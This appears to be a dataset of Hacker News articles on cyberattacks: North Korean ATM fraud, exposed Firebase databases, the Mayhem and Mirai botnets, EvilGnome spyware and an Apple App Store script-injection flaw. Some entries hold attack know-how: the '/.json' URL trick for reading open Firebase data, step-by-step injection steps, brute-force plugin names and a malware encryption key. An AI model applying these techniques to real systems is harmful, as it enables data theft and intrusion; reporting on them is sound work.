Bank Servers Hacked to Trick ATMs into Spitting Out Millions in Cash,https://thehackernews.com/2018/10/bank-atm-hacking.html,"The US-CERT has released a joint technical alert from the DHS, the FBI, and Treasury warning about a new ATM scheme being used by the prolific North Korean APT hacking group known as Hidden Cobra.
Hidden Cobra, also known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and has previously launched attacks against a number of media organizations, aerospace, financial and critical infrastructure sectors across the world.
The group had also reportedly been associated with the WannaCry ransomware menace that last year shut down hospitals and big businesses worldwide, the SWIFT Banking attack in 2016, as well as the Sony Pictures hack in 2014.
Now, the FBI, the Department of Homeland Security (DHS), and the Department of the Treasury have released details about a new cyber attack, dubbed ""FASTCash,"" that Hidden Cobra has been using since at least 2016 to cash out ATMs by compromising the bank server.
FASTCash Hack Fools ATMs into Spitting Out Cash
The investigators analyzed 10 malware samples associated with FASTCash cyber attacks and found that attackers remotely compromise payment ""switch application servers"" within the targeted banks to facilitate fraudulent transactions.
Switch application server is an essential component of ATMs and Point-of-Sale infrastructures that communicates with the core banking system to validate user's bank account details for a requested transaction.
Whenever you use your payment card in an ATM or a PoS machine in a retailer shop, the software asks (in ISO 8583 messages formats) the bank's switch application server to validate the transaction—accept or decline, depending upon the available amount in your bank account.
However, Hidden Cobra attackers managed to compromise the switch application servers at different banks, where they had accounts (and their payment cards) with minimal activity or zero balances.
The malware installed on the compromised switch application servers then intercepts transaction request associated with the attackers' payment cards and responds with fake but legitimate-looking affirmative response without actually validating their available balance with the core banking systems, eventually fooling ATMs to spit out a large number of cash without even notifying the bank.
""According to a trusted partner's estimation, HIDDEN COBRA actors have stolen tens of millions of dollars,"" the reports says.
""In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries.""
Hidden Cobra threat actors are using the FASTCash scheme to target banks in Africa and Asia, though the U.S. authorities are still investigating the FASTCash incidents to confirm whether the attack targets banks in the United States.
How Attackers Managed to Compromise Banks' Switch Application Servers
Though the initial infection vector used to compromise Bank networks is unknown, the U.S. authorities believe that the APT threat actors used spear-phishing emails, containing malicious Windows executable, against employees in different banks.
Once opened, the executable infected bank employees' computers with Windows-based malware, allowing hackers to move laterally through a bank's network using legitimate credentials and deploy malware onto the payment switch application server.
Though most compromised switch application servers were found running unsupported IBM Advanced Interactive eXecutive (AIX) operating system versions, investigators found no evidence that attackers exploited any vulnerability in AIX operating system.
US-CERT recommended banks to make two-factor authentication mandatory before any user can access the switch application server, and use best practices to protect their networks.
US-CERT has also provided a downloadable copy of IOCs (indicators of compromise), to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the Hidden Cobra hacking group.
In May 2018, the US-CERT also published an advisory alerting users of two different malware—Remote Access Trojan (RAT) known as Joanap and Server Message Block (SMB) worm called Brambul—linked to Hidden Cobra.
Last year, the DHS and the FBI also issued an alert describing Hidden Cobra malware Delta Charlie—a DDoS tool that they believed North Korea uses to launch distributed denial-of-service attacks against its targets.
Other malware linked to Hidden Cobra in the past includes Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware.
Thousands of Mobile Apps Expose Their Unprotected Firebase Hosted Databases,https://thehackernews.com/2018/06/mobile-security-firebase-hosting.html,"Mobile security researchers have discovered unprotected Firebase databases of thousands of iOS and Android mobile applications that are exposing over 100 million data records, including plain text passwords, user IDs, location, and in some cases, financial records such as banking and cryptocurrency transactions.
Google's Firebase service is one of the most popular back-end development platforms for mobile and web applications that offers developers a cloud-based database, which stores data in JSON format and synced it in the real-time with all connected clients.
Researchers from mobile security firm Appthority discovered that many app developers' fail to properly secure their back-end Firebase endpoints with firewalls and authentication, leaving hundreds of gigabytes of sensitive data of their customers publicly accessible to anyone.
Since Firebase offers app developers an API server, as shown below, to access their databases hosted with the service, attackers can gain access to unprotected data by just adding ""/.json"" with a blank database name at the end of the hostname.
Sample API URL: https://.firebaseio.com/
Payload to Access: Data https://.firebaseio.com/.json
To find the extent of this issue, researchers scanned over 2.7 million apps and found that more than 3,000 apps—2,446 Android and 600 iOS apps—were leaking a whole 2,300 databases with more than 100 million records, making it a giant breach of over 113 gigabytes of data.
The vulnerable Android apps alone were downloaded more than 620 million times.
Affected apps belong to multiple categories such as telecommunication, cryptocurrency, finance, postal services, ride-sharing companies, educational institutions, hotels, productivity, health, fitness, tools and more.
Researchers also provided a brief analysis, given below, of the obtained data they had downloaded from vulnerable applications.
2.6 million plaintext passwords and user IDs
4 million+ PHI (Protected Health Information) records (chat messages and prescription details)
25 million GPS location records
50,000 financial records including banking, payment and Bitcoin transactions
4.5 million+ Facebook, LinkedIn, Firebase, and corporate data store user tokens.
Researcher claims all this is happening at the first place because Google Firebase service does not secure user data by default, requiring developers to explicitly implement user authentication on all database rows and tables to protect their databases from unauthorized access.
""The only security feature available to developers is authentication and rule-based authorization,"" the researchers explain. What's worse? There are no ""third-party tools available to provide encryption for it.""
Researchers had already contacted Google and provided a list of all vulnerable app databases, and also contacted a few app developers helping them to patch this issue.
Operation Troy espionage campaign : Hackers steal South Korean military secrets,https://thehackernews.com/2013/07/operation-troy-espionage-campaign.html,"McAfee Lab researchers issued a report on the large scale cyber attacks against South Korea that appear to be linked to hackers also specialized in cyber espionage.
The attackers behind these recent attacks against South Korean infrastructure are skilled professionals and they designed a specialized malware to steal military secrets from the South Korea and US military networks.
The cyber espionage campaign dubbed as ""Operation Troy"", due the numerous references into the source code analyzed to the city. McAfee said that in 2009, malware was implanted into a social media website used by military personnel in South Korea
Ryan Sherstobitoff, a senior threat researcher at McAfee, started the investigation after the malware came into action in an attacks occurred on March 20th, known as the Dark Seoul Incident, in which tens of thousands of hard drives belongs to television networks and banks in South Korea were wiped completely.
Versions of the code may still be trying to glean military secrets from infected computers. Sherstobitoff said the same coded fingerprints were found on an attack June 25, the anniversary of the start of the 1950-53 Korean War - in which websites for South Korea's president and prime minister were attacked.
On June 26th the US Government announced that personal information about thousands of U.S. troops in South Korea had been exposed online.
The attackers infected victims with ""spear phishing"" attacks, the hackers also compromised about a dozen Korean-language religious, social and shopping websites to steal secret information from infected networks.
In the following image is proposed the timeline of the attacks:""This goes deeper than anyone had understood to date, and it's not just attacks: It's military espionage,"" Sherstobitoff said.
Despite the malware used to wipe the disks during the recent attacks against Korean infrastructures is different from the one used for the cyber espionage campaign, but many similarities have been found between the source codes of both and this led to believe that they must be created by the same malware developer team.
Researchers highlighted that there are various clues in the malicious code which lead to the North Korea, for example the password used to unlock encrypted files contains the number 38 probably linked to ""38th parallel"" that separates the North from South Korea.
After previous attack, Two different and previously unknown groups separately took credit: The ""Whois Hacking Team"" posted pictures of skulls and a warning, while the ""NewRomanic Cyber Army Team"" said it had leaked private information from banks and media organizations.
Before that attack, hackers had been sending spy malware on domestic networks for months, giving them the ability to gather information about how their internal servers work, what websites the users visit and which computers are responsible for security, the researchers found. This information would have been crucial for planning the coordinated attacks on banks and TV networks.
It is still not clear that the exact amount of information stolen or the exact networks penetrated by attackers, but South Korean officially blamed North Korean state sponsored-hackers.
The Hackers espionage on government networks with military information for at least four years, using code that automatically searched infected computers for dozens of military terms in Korean, including ""U.S. Army,"" ''secret,"" ''Joint Chiefs of Staff"" and ""Operation Key Resolve,"" an annual military exercise held by U.S. Forces Korea and the South Korean military.
""These included names of individuals, base locations, weapons systems and assets,"" revealed Sherstobitoff.
South Korea's Defense Ministry announced that it's technically impossible to disclose classified reports from military networks because the networks of the Korean Intelligence aren't connected to the Internet and the access to the Internet is made with different computers separated by the internal military infrastructure.
Hacking sensitive South Korean military computers from the Internet ""cannot be done,"" ""It's physically separated."" said the South Korean government representative.
North Korea has the highest percentage of military personnel in relation to population than any other nation in the world. It has approximately 40 enlisted soldiers per 1000 people with a considerable impact on the economy of the country. A defector has declared that North Korea has increased its cyber warfare unit to staff 3,000 people and it is massive training its young prodigies to become professional hackers.
The government of Pyongyang is massive investing in cyber warfare capabilities, recruiting and forming a high skilled team of hackers. The groups will could be engaged in offensive cyber operation against hostile government and in cyber espionage activities.
In spite of McAfee researchers haven't indicated the origin of the attacks many security experts have no doubts about the nature of the offensive, North Korean state sponsored hackers appear as the main culprits.
Hacker Stole Data of Over 70% Bulgarian Citizens from Tax Agency Servers,https://thehackernews.com/2019/07/bulgaria-nra-data-breach.html,"Eastern European country Bulgaria has suffered the biggest data breach in its history that compromised personal and financial information of 5 million adult citizens out of its total population of 7 million people.
According to multiple sources in local Bulgarian media, an unknown hacker earlier this week emailed them download links to 11GB of stolen data which included taxpayer's personal identifiable numbers, addresses, and financial data.
In a brief statement released Monday, the National Revenue Agency (NRA) of Bulgaria said the stolen data originates from the country's tax reporting service.
The NRA also indicated that the Ministry of the Interior and the State Agency for National Security (SANS) have started taking an assessment of the potential vulnerability in NRA's systems that attackers might have exploited to breach into its databases.
It appears that until now, the hacker, who claimed to be a Russian man, has only released 57 out of a total of 110 compromised databases, which is about 21GB in total.
In a follow-up announcement, the NRA said almost 20 days ago, the attacker unauthorizedly accessed about 3 percent of the information contained in their databases.
""Currently, e-services for citizens and businesses are functioning normally, with the exception of the VAT refund service paid abroad, as well as by the revenue office. Unregulated access to sensitive information is limited,"" the NRA said.
As consequences of the incident, Bulgaria's NRA tax agency is now facing a fine of up to 20 million euros ($22.43 million) or 4% of the agency's annual turnover over the data breach, said Prof. Veselin Tselkov, a member of the Commission for Personal Data Protection.
Suspected ""White Hat"" Hacker Arrested
Bulgarian police have also arrested a 20-year-old ""white-hat hacker"" as the main suspect for the NRA data breach after authorities raided his home and office in the capital Sofia and seized his computers containing encrypted data, according to a local media.
The arrested suspect, Christian Boykov, is a cybersecurity expert who has been training officers of the GCDPC for fighting organized cybercrime.
Boykov was in the news two years ago, when he found a vulnerability in the website of the Ministry of Education and Science (MES) and contacted ""Lords of the Air,"" a popular TV show to tell the story only after the ministry ignored his initial disclosure.
After that incident, Boikov was hired as an ethical hacker by the global cybersecurity company ""TAD Group,"" and at the moment of arrest, he was an employee of the company, where his job responsibility was to pentest the systems in the state agencies and private companies for potential vulnerabilities.
Since the investigation is still ongoing, at this moment, it's not clear if he is behind the NRA data breach. However, the Sofia City Prosecutor's Office accused Boykov of unauthorized access to a computer system that is part of the critical infrastructure of the state.
His lawyers say there is no evidence against the boy, but if proven guilty, Boikov—who has no past criminal record—could face up to 8 years in prison.
Hackers Who Hit Winter Olympics 2018 Are Still Alive and Kicking,https://thehackernews.com/2018/06/olympic-destroyer-malware.html,"Remember the 'Olympic Destroyer' cyber attack?
The group behind it is still alive, kicking and has now been found targeting biological and chemical threat prevention laboratories in Europe and Ukraine, and a few financial organisation in Russia.
Earlier this year, an unknown group of notorious hackers targeted Winter Olympic Games 2018, held in South Korea, using a destructive malware that purposely planted sophisticated false flags to trick researchers into mis-attributing the campaign.
Unfortunately, the destructive malware was successful to some extent, at least for a next few days, as immediately after the attack various security researchers postmortem the Olympic Destroyer malware and started attributing the attack to different nation-state hacking groups from North Korea, Russia, and China.
Later researchers from Russian antivirus vendor Kaspersky Labs uncovered more details about the attack, including the evidence of false attribution artifacts, and concluded that the whole attack was a masterful operation in deception.
Now according to a new report published today by Kaspersky Labs, the same group of hackers, which is still unattributed, has been found targeting organisations in Russia, Ukraine, and several European countries in May and June 2018, specifically those organizations that respond to and protect against biological and chemical threats.
New Attack Shares Similarities With Olympic Destroyer
During their investigation, researchers found that the exploitation and deception tactics used by the newly discovered campaign share many similarities with the Olympic Destroyer attack.
""In May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past,"" the researchers said. ""They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.""
Just like Olympic Destroyer, the new attack also targets users affiliated with specific organisations using spear-phishing emails that appear as coming from an acquaintance, with an attached document.
If the victims open the malicious document, it leverages macros to download and execute multiple PowerShell scripts in the background and install the final 3rd-stage payload to take remote control over the victims' system.
Researchers found that the technique used to obfuscate and decrypt the malicious code is same as used in the original Olympic Destroyer spear-phishing campaign.
The second-stage script disables Powershell script logging to avoid leaving traces and then downloads the final ""Powershell Empire agent"" payload, which allows fileless control of the compromised systems over an encrypted communication channel.
Hackers Target Biological and Chemical Threat Prevention Laboratories
According to the researchers, the group has attempted to gain access to computers in countries, including France, Germany, Switzerland, Russia, and Ukraine.
Researchers found evidence of hackers primarily targeting people affiliated with an upcoming biochemical threat conference, called Spiez Convergence, held in Switzerland and organized by Spiez Laboratory.
Spiez Laboratory played an essential role in investigating the poisoning in March of a former Russian spy in the UK. The U.K. and the U.S. both said Russia was behind the poisoning and expelled dozens of Russian diplomats.
Another document targeted Ministry of Health in Ukraine.
It is not yet known that who behind these attacks, but Kaspersky advises all biochemical threat prevention and research organizations to strengthen their IT security and run unscheduled security audits.
Mayhem — A New Malware Targets Linux and FreeBSD Web Servers,https://thehackernews.com/2014/07/mayhem-new-malware-targets-linux-and_24.html,"Security researchers from Russian Internet giant Yandex have discovered a new piece of malware that is being used to target Linux and FreeBSD web servers in order to make them a part of the wide botnet, even without the need of any root privileges.
Researchers dubbed the malware as Mayhem, a nasty malware modular that includes a number of payloads to cause malicious things and targets to infect only those machines which are not updated with security patches or less likely to run security software.
So far, researchers have found over 1,400 Linux and FreeBSD servers around the world that have compromised by the malware, with potentially thousands more to come. Most of the compromised machines are located in the USA, Russia, Germany and Canada.
Three security experts, Andrej Kovalev, Konstantin Ostrashkevich and Evgeny Sidorov, who work at Russia-based Internet portal Yandex, discovered the malware targeting *nix servers. They were able to trace transmissions from the infected computers to the two command and control (C&C) servers.
""In the *nix world, autoupdate technologies aren't widely used, especially in comparison with desktops and smartphones. The vast majority of web masters and system administrators have to update their software manually and test that their infrastructure works correctly,"" the trio wrote in a technical report for Virus Bulletin.
""For ordinary websites, serious maintenance is quite expensive and often webmasters don't have an opportunity to do it. This means it is easy for hackers to find vulnerable web servers and to use such servers in their botnets.""
Researchers say that this new type of malware can work under restricted privileges on the systems and has been created by keeping multiple functionality in mind. The malicious attack is conducted via a more sophisticated PHP script, that has a low detection rate with the antivirus engines available.
Communication of the system is established with the command and control servers, which can send the malware different instructions. As we mentioned above that Mayhem is a modular, its functions can be expanded through plugins and at the moment some eight plugins have been discovered, those are listed below:
rfiscan.so - Find websites that contain a remote file inclusion (RFI) vulnerability
wpenum.so - Enumerate users of WordPress sites
cmsurls.so - Identify user login pages in sites based on the WordPress CMS
bruteforce.so - Brute force passwords for sites based on the WordPress and Joomla CMSs
bruteforceng.so - Brute force passwords for almost any login page
ftpbrute.so - Brute force FTP accounts
crawlerng.so - Crawl web pages (by URL) and extract useful information
crawlerip.so - Crawl web pages (by IP) and extract useful information
In case of rfiscan.so, the malware spreads by finding servers hosting websites with a remote file inclusion (RFI) vulnerability that it checks using 'https://www.google.com/humans.txt' file. If the HTTP response contains the words 'we can shake', then the plugin decides that the website has a remote file inclusion vulnerability.
Once the malware exploits an RFI, or any other weakness mentioned above, and get installed, it will run a PHP script on a victim. The PHP script kills all '/usr/bin/host' processes, check for the system architecture and OS (whether Linux or FreeBSD), and then drops a malicious object identified as 'libworker.so'.
Meanwhile, the PHP script also defines a variable named 'AU', which includes the full URL of the script being executed. It also executes the shell script which is then being executed, then pings its Command-and-Control server.
The malware then creates a hidden file system, known as sd0, and downloads all the above eight plugins, none of which were detected by the VirusTotal malware scanning tool.
Mayhem was first detected in April 2014, and according to the trio, it is a continuation of the ""Fort Disco"" brute-force campaign that was unearthed by Arbor Networks in 2013.
The Yandex researchers warned people that there may be more plugins in circulation, based on information they discovered on the two detected Command-and-Control servers, including one which specifically exploits the systems that haven't patched the critical Heartbleed vulnerability in OpenSSL.
Original Author of Petya Ransomware is Back & He Wants to Help NotPetya Victims,https://thehackernews.com/2017/06/petya-ransomware-decryption-key.html,"The author of original Petya ransomware is back.
After 6 months of silence, the author of the now infamous Petya ransomware appeared today on Twitter to help victims unlock their files encrypted by a new version of Petya, also known as NotPetya.
""We're back having a look in NotPetya,"" tweeted Janus, a name Petya creator previously chose for himself from a villain in James Bond. ""Maybe it's crackable with our privkey. Please upload the first 1MB of an infected device, that would help.""
This statement made by the Petya author suggests he may have held onto a master decryption key, which if it works for the new variant of Petya infected files, the victims would be able to decrypt their files locked in the recent cyber outcry.
Janus sold Petya as a Ransomware-as-a-Service (RaaS) to other hackers in March 2016, and like any regular ransomware, original Petya was designed to lock victim's computer, then return them when a ransom is paid.
This means anyone could launch the Petya ransomware attack with just the click of a button, encrypt anyone's system and demand a ransom to unlock it. If the victim pays, Janus gets a cut of the payment. But in December, he went silent.
However, on Tuesday, the computer systems of the nation's critical infrastructure and corporations' in Ukraine plus 64 other countries were struck by a global cyber attack, which was similar to the WannaCry outbreak that crippled tens of thousands of systems worldwide.
Initially, the new variant of Petya ransomware, NotPetya, was blamed for infecting systems worldwide, but later, the NotPetya story took an interesting turn.
Yesterday, it researchers found that NotPetya is not a ransomware, rather it's a wiper malware that wipes systems outright, destroying all records from the targeted systems.
NotPetya also uses the NSA's leaked Windows hacking exploit EternalBlue and EternalRomance to rapidly spread within a network, and uses WMIC and PSEXEC tools to remotely execute malware on the machines.
Experts even believe the real attack has been disguised to divert world's attention from a state-sponsored attack to a malware outbreak.
Petya's source code has never been leaked, but some researchers are still trying hard to reverse engineer it to find possible solutions.
Would this Really Help Victims?
Since Janus is examining the new code and even if his master key succeeds in decrypting victims' hard drive's master file table (MFT), it won't help much until researchers find a way to repair the MBR, which is wiped off by NotPetya without keeping any copy.
Tuesday's cyber outbreak is believed to be bigger than WannaCry, causing disasters to many critical infrastructures, including bricking computers at a Ukrainian power company, several banks in Ukraine, and the country's Kyiv Boryspil International Airport.
The NotPetya virus has also canceled surgeries at two Pittsburgh-area hospitals, hit computers at the pharmaceutical company Merck and the law firm DLA Piper, as well as infected computers at the Dutch shipping company A.P. Moller-Maersk forcing them to shut down some container terminals in seaports from Los Angeles to Mumbai.
EvilGnome: A New Backdoor Implant Spies On Linux Desktop Users,https://thehackernews.com/2019/07/linux-gnome-spyware.html,"Security researchers have discovered a rare piece of Linux spyware that's currently fully undetected across all major antivirus security software products, and includes rarely seen functionalities with regards to most Linux malware, The Hacker News learned.
It's a known fact that there are a very few strains of Linux malware exist in the wild as compared to Windows viruses because of its core architecture and also due to its low market share, and also many of them don't even have a wide range of functionalities.
In recent years, even after the disclosure of severe critical vulnerabilities in various flavors of Linux operating systems and software, cybercriminals failed to leverage most of them in their attacks.
Instead, a large number of malware targeting Linux ecosystem is primarily focused on cryptocurrency mining attacks for financial gain and creating DDoS botnets by hijacking vulnerable servers.
However, researchers at security firm Intezer Labs recently discovered a new Linux backdoor implant that appears to be under development and testing phase but already includes several malicious modules to spy on Linux desktop users.
EvilGnome: New Linux Spyware
Dubbed EvilGnome, the malware has been designed to take desktop screenshots, steal files, capture audio recording from the user's microphone as well as download and execute further second-stage malicious modules.
According to a new report Intezer Labs shared with The Hacker News prior to its release, the sample of EvilGnome it discovered on VirusTotal also contains an unfinished keylogger functionality, which indicates that it was uploaded online mistakenly by its developer.
EvilGnome malware masquerades itself as a legit GNOME extension, a program that lets Linux users extend the functionality of their desktops.
According to the researchers, the implant is delivered in the form of a self-extracting archive shell script created with 'makeself,' a small shell script that generates a self-extractable compressed tar archive from a directory.
The Linux implant also gains persistence on a targeted system using crontab, similar to windows task scheduler, and sends stolen user data to a remote attacker-controlled server.
""Persistence is achieved by registering gnome-shell-ext.sh to run every minute in crontab. Finally, the script executes gnome-shell-ext.sh, which in turn launches the main executable gnome-shell-ext,"" the researchers said.
EvilGnome's Spyware Modules
The Spy Agent of EvilGnome contains five malicious modules called ""Shooters,"" as explained below:
ShooterSound — this module uses PulseAudio to capture audio from the user's microphone and uploads the data to the operator's command-and-control server.
ShooterImage — this module uses the Cairo open source library to captures screenshots and uploads them to the C&C server. It does so by opening a connection to the XOrg Display Server, which is the backend to the Gnome desktop.
ShooterFile — this module uses a filter list to scan the file system for newly created files and uploads them to the C&C server.
ShooterPing — the module receives new commands from the C&C server, like download and execute new files, set new filters for file scanning, download and set new runtime configuration, exfiltrate stored output to the C&C server, and stop any shooter module from running.
ShooterKey — this module is unimplemented and unused, which most likely is an unfinished keylogging module.
Notably, all the above modules encrypt their output data and decrypt commands received from the C&C server with RC5 key ""sdg62_AS.sa$die3,"" using a modified version of a Russian open source library.
Possible Connection b/w EvilGnome and Gamaredon Hacking Group
Furthermore, the researchers also found connections between EvilGnome and Gamaredon Group, an alleged Russian threat group that has been active since at least 2013 and has targeted individuals working with the Ukrainian government.
Here below, I have briefed some of the similarities between EvilGnome and Gamaredon Group:
EvilGnome uses a hosting provider that has been used by Gamaredon Group for years and continues to be used by it.
EvilGnome also found to be operating on an IP address that was controlled by the Gamaredon group two months ago.
EvilGnome attackers are also using '.space' TTLD for their domains, just as the Gamaredon Group.
EvilGnome employs techniques and modules—like the use of SFX, persistence with task scheduler, and the deployment of information-stealing tools—that remind of Gamaredon Group's Windows tools.
How to Detect EvilGnome Malware?
To check if your Linux system is infected with the EvilGnome spyware, you can look for the ""gnome-shell-ext"" executable in the ""~/.cache/gnome-software/gnome-shell-extensions"" directory.
""We believe this is a premature test version. We anticipate newer versions to be discovered and reviewed in the future, which could potentially shed more light into the group's operations,"" researchers conclude.
Since security and antivirus products are currently failing to detect the EvilGnome malware, researchers recommend concerned Linux administrators to block the Command & Control IP addresses listed in the IOC section of Intezer's blog post.
Malicious Mobile Charger can Hack your iPhone within a minute,https://thehackernews.com/2013/06/malicious-mobile-charger-can-hack-your.html,"You might want to be a little more careful the next time you pick up a cheap knock-off accessory for your device to save a few bucks because new hardware hacks could be the next big thing among cyber criminals.
Researchers say they've built a custom iPhone wall charger that can Install malware in any iOS device using a custom made malicious chargers called Mactans, which are in turn controlled by a Raspberry-Pi like computer called a BeagleBoard.
Mactans, which is named after the black widow spider's Latin taxonomy, will be demonstrated by Billy Lau, Yeongjin Jang, and Chengyu Song at the Black Hat 2013 conference in July and they said all users were vulnerable to attacks over the charger.
They add that they can also demonstrate that the malware infection resulting from their malicious charger is persistent and tough to spot. In order for the malicious software to remain installed and unseen, the trio will show how an attacker can hide their software in the same way Apple hides its own built-in applications.
Researchers wanted to show just how easy and cheap it can be to cause a lot of virtual destruction in an innocent package. The security researchers have disclosed the vulnerability to Apple, but presumably Apple hasn't fixed the hole yet as the researchers are refusing to give out exact details until the conference.
It doesn't even matter what version of Apple iOS an iPhone or iPad the user is running, the hack doesn't discriminate again any Apple platform.
China — OPM Hack was not State-Sponsored; Blames Chinese Criminal Gangs,https://thehackernews.com/2015/12/china-hacker-opm-breach.html,"In the most surprising manner, the Chinese government said it arrested criminal hackers behind the massive cyber attack on US Office of Personnel Management (OPM) earlier this year, dismissing its involvement.
Three months back, we reported that China arrested a handful of hackers within its borders who were suspected of allegedly stealing commercial secrets from US companies.
The arrests took place shortly before China President Xi Jinping visited the United States in September 2015 when both heads of states agreed that neither side will participate in commercial espionage against one another.
China: Cyber Criminals Hacked OPM, Not Government Spies
Now, those suspected hackers have turned out to be the ones in connection with the OPM hack that resulted in the theft of personal details of more than 21 Million United States federal employees, including 5.6 Million federal employees' fingerprints.
Citing an ""investigation"", the Chinese government said the OPM hack was actual ""a criminal case"" rather than a state-sponsored attack as the US government had suspected, Chinese media outlet Xinhua News Agency reported.
Related Stories:
5.6 Million Federal Employees' Fingerprints Stolen in OPM Breach
China arrested Hackers at U.S. Government Request
Some unknown US federal officials had previously blamed China for the attack, though, they did not publicly point their fingers at the Chinese government.
No further details regarding the investigation were provided yet or whether the United States or Chinese government had conducted the investigation.
However, US government has urged for more detailed information sharing, though, White House spokesperson told Reuters that the first U.S.-Chinese dialogue was ""an important step"" in addressing US concerns about Chinese cyber-espionage.
So, now let's just wait till June, when both the countries would meet again for the second cyber security ministerial talk in Beijing.
Critical Persistent Injection Vulnerability in Apple App Store and iTunes,https://thehackernews.com/2015/07/vulnerability-apple-store.html,"A critical vulnerability has been discovered in the official Apple's App Store and iTunes Store, affecting millions of Apple users.
Vulnerability-Lab Founder and security researcher Benjamin Kunz Mejri discovered an Application-Side input validation web vulnerability that actually resides in the Apple App Store invoice module and is remotely exploitable by both sender as well as the receiver.
The vulnerability, estimated as high in severity, has been reported to Apple Security team on June 9, 2015 and the company patched the issue within a month.
How the vulnerability works?
By exploiting the flaw, a remote hacker can manipulate the name value (device cell name) by replacing it with a malicious script code.
Now, if the attacker buys any product in the App Store or iTunes Store, the internal app store service takes the device value (which is actually the malicious code) and generates the invoice which is then sends to the seller account.
This results in an Application-side script code execution in the invoice of Apple.
In addition, remote hackers can manipulate the vulnerability through persistent manipulated context to other Apple store user accounts.
""The invoice is present to both parties (buyer & seller) which demonstrates a significant risk to buyers, sellers or apple website managers/developers,"" says the researcher. ""The issue impact also the risk that a buyer can be the seller by usage of the same name to compromise the store online service integrity.""
Successful exploitation of the bug could allow an attacker to perform a number of sensitive tasks, including
Session hijacking
Persistent redirect to external sources
Persistent phishing attacks
Persistent manipulation of affected service module context
Exploitation of the vulnerability requires a low privileged Apple web-application user (App Store/iCloud) account and low or medium user interaction.
The researcher published step by step method to exploit the flaw:
Inject the malicious script code to your device cell name
Buy an article by using Apple iTunes or App Store
Select any App or Movie that you would like to Buy and Download
After the download is completed, an Invoice receives to your inbox
An application-side injected script code execution occurs in the arrived emails context next to the device-cell and type cell value parameters
Successful reproduce of the remote vulnerability
You can also watch the video that shows the attack in work.
Crashing Google Email App for Android Just By Sending a Malicious Email,https://thehackernews.com/2015/02/stock-android-email-app.html,"A vulnerability has been discovered in the wildly popular Google's Stock Android Email App, that could be exploited by malicious attackers to remotely crash your smartphone application just by sending a specially crafted email.
A Spain security researcher, Hector Marco, successfully exploited the vulnerability on his Samsung Galaxy S4 Mini running version of Stock Android Email App. He said the flaw appears to affect all older versions of Stock Android Email App, though devices running and newer versions are not affected.
According to the researcher, when the victim receives the malicious email and tries to view it, the email app crashes. Further attempts to open the email again triggers a crash in the application before the victim can do anything.
The flaw (CVE-2015-1574) is due to incorrect handling of the Content-Disposition header. Hackers could exploit the vulnerability by sending an email with a malformed Content-Disposition header to the targeted user in order to cause email application crash.
The only way to get rid of this crash issue is to remove the malicious email from the Stock Android Email App.
""Since the application crashes immediately, [and the] easiest and straightforward way to remove [the issue] is by using other email client (or via web) from the inbox at the email server,"" Marco explained in a blog post. ""Another way is by disabling the internet connection (Airplane mode) before launching the email reader, and then you can remove the offending email.""
However, removing the malicious email from the app's inbox is only a temporary solution because the attackers can send as many malicious email as they want, Marco noted.
For proof-of-concept (PoC) demonstration, Marco publishes a python exploit code on Tuesday, and explained how sending a specially crafted email to a targeted user can crash victim's email application.
So far, there are no reports that Marco's exploit also works on iOS or other platform users. But the vulnerability affects a majority of Android smartphone users as the version of Stock Email App from Google comes pre-installed on the official versions of Android.
It isn't clear whether the vulnerability has been reported to Google. Users can upgrade their email Android application to or higher in order to protect themselves, but only those users who have option to upgrade.
Unfortunately the upgradation is not possible in all Android versions. Marco said his current Samsung Galaxy 4 mini was fully updated and is vulnerable to this attack, because no higher versions to are available for his device.
New Mirai Okiru Botnet targets devices running widely-used ARC Processors,https://thehackernews.com/2018/01/mirai-okiru-arc-botnet.html,"The cybersecurity threat landscape has never been more extensive and is most likely to grow exponentially in 2018.
Although the original creators of Mirai DDoS botnet have already been arrested and jailed, the variants of the infamous IoT malware are still in the game due to the availability of its source code on the Internet.
Security researchers have spotted a new variant of infamous Mirai IoT malware designed to hijack insecure devices that run on ARC embedded processors.
Until now, Mirai and its variants have been targeting CPU architectures—including x86, ARM, Sparc, MIPS, PowerPC and Motorola 6800—deployed in millions of Internet of Things (IoT) devices.
Dubbed Okiru, the new Mirai variant, first spotted by @unixfreaxjp from MalwareMustDie team and notified by independent researcher Odisseus, is a new piece of ELF malware that targets ARC-based embedded devices running Linux operating system.
""This is the FIRST TIME ever in the history of computer engineering that there is a malware for ARC CPU, & it is #MIRAI OKIRU!! Pls be noted of this fact, & be ready for the bigger impact on infection Mirai (specially #Okiru) to devices hasn't been infected yet,"" Odisseus tweeted.
ARC (Argonaut RISC Core) embedded processor is the world's second-most-popular CPU core that's being shipped in more than 2 billion products every year, including cameras, mobile, utility meters, televisions, flash drives, automotive and the Internet of Things.
However, this isn't first Mirai botnet variant based on Linux ELF malware. Mirai also has another ELF-based variant, which was designed to target devices running MIPS and ARM processors.
It should also be noted that Okiru, which has previously been also named as Satori IoT botnet (another Mirai variant discovered late last year), is ""very different"" from Satori despite having several similar characteristics, as explained in a Reddit thread.
Record-Breaking DDoS? The Calm Before The Storm
IoTs are currently being deployed in a large variety of devices throughout your home, businesses, hospitals, and even cities (smart cities), but they're routinely being hacked and used as cyber weapons due to lack of stringent security measures and insecure encryption mechanisms.
If you are unaware, the world's largest 1 Tbps DDoS attack so far was launched from just 152,000 infected IoT devices using Mirai botnet, and in a separate attack, just 100,000 devices took down the popular DynDNS service in late 2016.
Since Okiru has been ported to target a new range of millions of ""expectedly insecure"" devices running ARC processors, the DDoS attack going to be generated by Okiru botnet would probably be the biggest cyberattack ever.
""From this day, the landscape of #Linux #IoT infection will change. #ARC CPU has produced #IoT devices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It's a serious threat will be,"" Odisseus tweeted.
The fresh arrival of ARC-based IoT devices into botnet scheme will exponentially raise the number of insecure devices to an unprecedented size, making it easy for hackers to gain control over a large number of poorly configured and vulnerable IoT devices.
